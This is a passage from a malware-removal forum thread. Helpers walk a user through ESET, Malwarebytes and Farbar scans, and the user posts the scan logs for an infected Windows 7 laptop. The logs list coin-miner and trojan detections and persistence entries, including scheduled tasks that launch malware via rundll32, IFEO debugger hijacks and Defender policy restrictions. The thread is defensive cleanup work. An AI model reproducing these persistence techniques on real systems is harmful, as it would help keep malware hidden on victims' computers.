Keep RKill available
I would suggest a free scan with the ESET Online Scanner.
Go to https://download.ese...linescanner.exe
It will start a download of "esetonlinescanner.exe"
Save the file to your system, such as the Downloads folder, or else to the Desktop.
Go to the saved file, and double click it to get it started.
When presented with the initial ESET options, click on "Computer Scan".
Next, when prompted by Windows, allow it to start by clicking Yes
When prompted for scan type, Click on Full scan
Look at & tick ( select ) the radio selection "Enable ESET to detect and quarantine potentially unwanted applications" and click on Start scan button.
Have patience. The entire process may take an hour or more. There is an initial update download.
There is a progress window display. You may step away from machine &. Let it be.
You should ignore all prompts to get the ESET antivirus software program. ( e.g. their standard program). You do not need to buy or get or install anything else.
When the scan is completed, if something was found, it will show a screen with the number of detected items. If so, click the button marked View detected results.
Click The blue Save scan log to save the log.
If something was removed and you know it is a false finding, you may click on the blue Restore cleaned files ( in blue, at bottom).
Press Continue when all done. You should click to off the offer for periodic scanning.
Please make sure you attach the log report.
Try another scan with MalwareBytes with rootkit scan enabled.
WE'RE SURE THAT YOU'LL LOVE US!
Hey there! 
Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. 
Join 93100 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.
Try What the Tech -- It's free!
Multiple infections including conhoy.exe
-
This topic is locked
#16
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 29 March 2022 - 10:33 AM
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
Register to Remove
#17
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 29 March 2022 - 10:34 AM
AFter trying to scan with the above, please take a new scan using Farbar Recovery Tool
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#18
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 29 March 2022 - 01:17 PM
Finally got EMIsoft to run. Here is the log.
Edited by Ztruker, 29 March 2022 - 01:23 PM.
Rich
Die with memories, not dreams. – Unknown
#19
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 29 March 2022 - 01:26 PM
I'll run ESET if it will run then Malwarebytes with rootkit scan enabled again and post all results.
Edit: MBAM finished, here is the log:
Edited by Ztruker, 29 March 2022 - 02:38 PM.
Rich
Die with memories, not dreams. – Unknown
#20
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 29 March 2022 - 03:38 PM
How is the computer now?
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#21
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 29 March 2022 - 05:20 PM
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#22
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 29 March 2022 - 05:52 PM
On a normal boot, conhoy.exe still shows up in C:\Windows\Temp.
Here is the ESET scan:
3/29/2022 19:40:22 PM
Files scanned: 204567
Detected files: 8
Cleaned files: 8
Total scan time 01:34:21
Scan status: Finished
C:\Windows\debug\item.dat a variant of Win32/Agent.WTF trojan cleaned by deleting
C:\Windows\inf\aspnet\config.json Win64/CoinMiner.RO potentially unwanted application cleaned by deleting
C:\Windows\inf\aspnet\lsma22.exe a variant of Win64/CoinMiner.AAP trojan cleaned by deleting
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[1].exe a variant of Win32/Agent.UIG trojan cleaned by deleting
C:\Windows\System32\Tasks\Mysa2 XML/TrojanDownloader.ftp.A trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\20201117[2].rar a variant of Win32/Agent.WTF trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[1].exe a variant of Win32/Agent.TZB trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025[2].rar a variant of Win64/CoinMiner.AAP trojan cleaned by deleting
==============================================================================
Farbar reports next:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-03-2022
Ran by Marilyn (administrator) on MARILYN-HP (Hewlett-Packard HP G56 Notebook PC) (29-03-2022 19:42:05)
Running from C:\Users\Marilyn\Desktop
Loaded Profiles: Marilyn
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Brave
Boot Mode: Safe Mode (with Networking)
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(services.exe ->) (Cisco WebEx LLC -> Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(services.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2012-02-02] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6245408 2010-05-25] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Everything] => C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe (No File)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (No File)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe (No File)
HKLM-x32\...\Run: [AvgUi] => "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw (No File)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [CCleaner Smart Cleaning] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {1addf19c-3bd0-11e5-b90f-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {39bee1c8-8691-11e7-973b-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKLM\...\Print\Monitors\HP a011 Status Monitor: C:\Windows\system32\hpinkstsa011LM.dll [354152 2011-06-08] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\...\Print\Monitors\HP DC11 Status Monitor: C:\Windows\system32\hpinkstsDC11LM.dll [336904 2014-08-01] (Hewlett Packard -> Hewlett-Packard Development Company, LP)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\91.0.4472.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\system32\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\99.1.36.122\Installer\chrmstp.exe [2022-03-28] (Brave Software, Inc. -> Brave Software, Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\SysWOW64\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1F798407-258E-40E4-88D5-09E365947CCC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe /s /p 1 (No File)
Task: {2B642391-2C6A-419F-A839-4CD0FB785BDE} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe (No File)
Task: {53967A89-F06F-46F1-B3BA-D1A5E6FB8CBD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L Analysis (No File)
Task: {64F3A87C-8458-49D9-AA07-4AA60700F58D} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {77B2A611-2A8B-4136-9E0A-B69F523C8EA1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=2 (No File)
Task: {88C169BB-B378-4BDD-BF10-DE1BA9564722} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {8A502165-5679-46B2-83D6-881CC55ED923} - System32\Tasks\{F3E9CAEC-BBD5-4EE4-9A4A-BB27D26A356D} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Hewlett-Packard\SmartPrint\smartprintsetup.exe" -d C:\Users\Marilyn\Desktop
Task: {A4A25E16-BC91-4ACE-9676-11A976F8163C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L TuneupTimer (No File)
Task: {A760FF1D-B5F3-4136-8519-93331B6E089C} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {AA8D5163-B71D-4B7E-B7C2-215E15C37B54} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe (No File) <==== ATTENTION
Task: {ADC35D8D-8FD8-4112-A8AE-1873442EF63F} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {B6513C2B-1469-4BB6-9007-29A630203521} - System32\Tasks\HPCustPartic.exe_{BE46DC17-3C77-4163-8B22-E2A235CF8971} => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe /installoptin 1444481912 /installreport yes (No File)
Task: {CD1BAF60-5996-47FD-8F0B-1BFC5643A5BC} - \Mysa2 -> No File <==== ATTENTION
Task: {CEAF0A86-3EE6-4454-8C0D-CD971E6FEF8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=1 (No File)
Task: {DC967769-6098-473C-8B18-8854081C98E1} - System32\Tasks\{F49F3141-310E-4D17-964E-8CBAEDD01415} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\DriverUpdate\UninstallStub.exe" -c --log {36488064-fdb3-451c-923b-fdd9d69c2554}
Task: {DE3295F5-6883-451F-8BD7-F00ACCB8E70C} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe /eu (No File)
Task: {DF5AF517-6345-4C01-9682-5D3B6468BCE8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (No File)
Task: {F094EA7D-B75A-434A-B205-0A3FF27DADDB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe /taskrestart (No File)
Task: {FB7E5A6C-33D5-432D-98AE-AF0F25FE07BD} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {FE236B39-3A39-4715-B59E-00AAB070A19E} - System32\Tasks\{046A1759-6A62-4179-9ADF-004EE4E67228} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -c /AppMode=SETUP /Uninstall
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\EOSv3 Scheduler onLogOn.job => C:\Users\Marilyn\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe
Task: C:\Windows\Tasks\EOSv3 Scheduler onTime.job => C:\Users\Marilyn\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7abfca63-0362-4561-bed5-28e417e3aeb4} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{A9E69046-4B35-4ED2-BFB6-2CF003180388}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{BC3C3E83-A47F-40E3-8DD5-864B4044E098}: [DhcpNameServer] 172.16.103.1
FireFox:
========
FF DefaultProfile: hsfkrlor.default
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\hsfkrlor.default [2022-03-28]
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\krham40v.default-release [2022-03-28]
FF Homepage: Mozilla\Firefox\Profiles\krham40v.default-release -> hxxps://www.google.com/?gws_rd=ssl
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (SmartPrintButton) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [No File]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1250379553-2428740185-3603661230-1000: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\Marilyn\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife -> RocketLife, LLP)
Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
Brave:
=======
BRA Profile: C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2022-03-29]
BRA HomePage: Default -> hxxps://www.google.com/
BRA StartupUrls: Default -> "hxxps://www.google.com/"
BRA DefaultSearchKeyword: Default -> :g
BRA Extension: (Malwarebytes Browser Guard) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2022-03-28]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2022-03-28]
BRA Extension: (Brave NTP background images) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2022-03-28]
BRA Extension: (Wallet Data Files Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\BraveWallet [2022-03-28]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2022-03-28]
BRA Extension: (Brave NTP sponsored images) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\gccbbckogglekeggclmmekihdgdpdgoe [2022-03-29]
BRA Extension: (Brave SpeedReader Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\jicbkmdloagakknpihibphagfckhjdih [2022-03-28]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2022-03-28]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AERTFilters; C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [98208 2009-11-17] (Andrea Electronics -> Andrea Electronics Corporation)
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
S2 CinemaNow Service; C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemanowSvc.exe [140272 2010-05-21] (Sonic Solutions -> CinemaNow, Inc.)
S3 clr_optimization_v2.0.50727_64; C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [89920 2009-06-10] (Microsoft Corporation -> Microsoft Corporation)
S2 clr_optimization_v4.0.30319_64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [123856 2012-07-09] (Microsoft Dynamic Code Publisher -> Microsoft Corporation)
S2 Everything; C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7972536 2022-03-28] (Malwarebytes Inc -> Malwarebytes)
S3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc. -> McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2291568 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
S3 ClientAnalyticsService; "C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe" [X]
S4 HomeNetSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 HP Support Assistant Service; "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe" [X]
S4 McBootDelayStartSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McMPFSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McNaiAnn; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McODS; "C:\Program Files\McAfee\VirusScan\mcods.exe" [X]
S4 mcpltsvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McProxy; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 MSK80Service; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc. -> McAfee, Inc.)
S2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [220568 2022-03-29] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [69040 2022-03-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248992 2022-03-29] (Malwarebytes Inc -> Malwarebytes)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [87928 2016-08-01] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
